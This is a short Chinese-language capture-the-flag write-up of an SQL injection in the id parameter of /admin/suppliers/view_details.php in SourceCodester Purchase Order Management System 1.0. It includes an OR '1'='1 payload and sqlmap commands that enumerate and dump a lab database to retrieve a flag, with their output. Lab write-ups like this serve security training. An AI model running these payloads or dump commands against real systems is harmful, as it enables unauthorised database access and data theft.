靶标介绍:
在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。
payload:
http://example.com/admin/suppliers/view_details.php?id=1' OR '1'='1
靶场地址:
http://eci-2zegr1lowy8mcyvowgaf.cloudeci1.ichunqiu.com/admin/login.php
使用sqlmap进行漏洞验证:
python sqlmap.py -u "http://eci-2zegr1lowy8mcyvowgaf.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" --batch -dbs
运行结果:
available databases [4]:
[] information_schema
[] mysql
[] performance_schema
[] purchase_order_db
使用sqlmap查看每个数据库发现flag在purchase_order_db中
python sqlmap.py -u "http://eci-2zegr1lowy8mcyvowgaf.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" --batch -D purchase_order_db --tables
运行结果:
Database: purchase_order_db
[7 tables]
+---------------+
| fllllaaaag |
| item_list |
| order_items |
| po_list |
| supplier_list |
| system_info |
| users |
+---------------+
使用sqlmap查看 flag表
python sqlmap.py -u "http://eci-2zegr1lowy8mcyvowgaf.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" --batch --batch -D purchase_order_db -T fllllaaaag -dump
运行结果:
Database: purchase_order_db
Table: fllllaaaag
[1 entry]
+----+--------------------------------------------+
| id | flag |
+----+--------------------------------------------+
| 1 | flag{caa8bfc7-a6de-4c22-a028-4be1e23bfda5} |
+----+--------------------------------------------+